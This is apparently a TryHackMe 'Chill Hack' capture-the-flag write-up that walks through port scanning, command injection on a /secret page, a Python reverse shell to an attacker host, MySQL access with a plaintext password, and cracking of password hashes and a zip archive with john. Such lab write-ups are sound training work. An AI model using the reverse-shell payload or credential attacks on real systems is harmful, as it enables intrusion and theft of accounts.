Chill Hack
Last updated
Last updated
mkdir ~/Documents/TryHackMe/eJPT/ChillHack
cd ~/Documents/TryHackMe/eJPT/ChillHack
mkdir recon enumeration notes
touch notes/{README.md,vulns,creds}
export IP=10.10.44.40
export URL=http://$IPFirst let's scan the machine for open ports. I usually do this with nmap You need to run this command as root.
nmap -Pn -p- -v -T4 --max-retries 5 $IP -oN recon/nmap.init;
cat recon/nmap.init | grep '/.*open'| cut -d '/' -f 1| tr '\n' ', '| sed 's/.$//g' > recon/ports;
sudo nmap -Pn -sS -sV -n -v -A -T4 -p $(cat recon/ports) $IP -oN recon/nmap.alltcpThis will take a while so I use rustscan to make a quick scan.
rustscan -a $IP --ulimit 5000 -- -sC -sV -v -oN recon/rustscan.initBefore accessing the website I like to see what can I find in ftp server. And I found something interesting, 2 possible user, Anurodh and Apaar.
Now let’s enumerate the website using feroxbuster and dirsearch
After this I found an interesting directory, /secret Here we can inject commands, but it looks that the application has some filleter.
After trying a lot of reverse shell I found something that it works.
export RHOST="10.8.113.25";export RPORT=9001;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'Now get some info about the server. Using netstat command to see connections on this machine. 9001 port is mine 53 is for DNS, so 3306 remain for investigate. 3306 port is default port for SQL.
www-data@ubuntu:/var/www/files$ netstat -tulpn
netstat -tulpn
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:9001 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::21 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 10.10.44.40:68 0.0.0.0:* -In /var/www/files/index.php I found something interesting. I assume that this are creds for sql database.
www-data@ubuntu:/var/www/files$ mysql -h localhost -P 3306 -u root -p
mysql -h localhost -P 3306 -u root -p
Enter password: !@m+her00+@db
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 4
Server version: 5.7.31-0ubuntu0.18.04.1 (Ubuntu)Let’s crack this hashes and get the passwords for apaar and anurodh.
anurodh:masterpassword
apaar:dontaskdonttell
After some tries it seems that this are not the credentials for ssh , so let’s enumerate to see what can we found.
I found in home directory of apaar a file that can be read by www-data. And if you check what www-data can execute (sudo -l) you’ll see that this file can be execute.
I came across an intriguing file in the /var/www/files/images folder, prompting me to set up a simple HTTP server using Python to facilitate the download of said file. Upon further investigation, I identified a file named backup.zip.
It seems that I need a password to unzip that file so I use john to crack that password.
$zip2john backup.zip > hash
$john hash -w=~/Documents/rockyou.txt --format=pkzip
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
pass1word (backup.zip/source_code.php)
1g 0:00:00:00 DONE (2023-12-03 11:18) 100.0g/s 1638Kp/s 1638Kc/s 1638KC/s total90..cocoliso
Use the "--show" option to display all of the cracked passwords reliably
Session completed.I have obtained a PHP file named source_code.php, in which I discovered credentials associated with the username 'anurodh'.
echo 'IWQwbnRLbjB3bVlwQHNzdzByZA=='| base64 -dAfter some enumeration I found the answer.
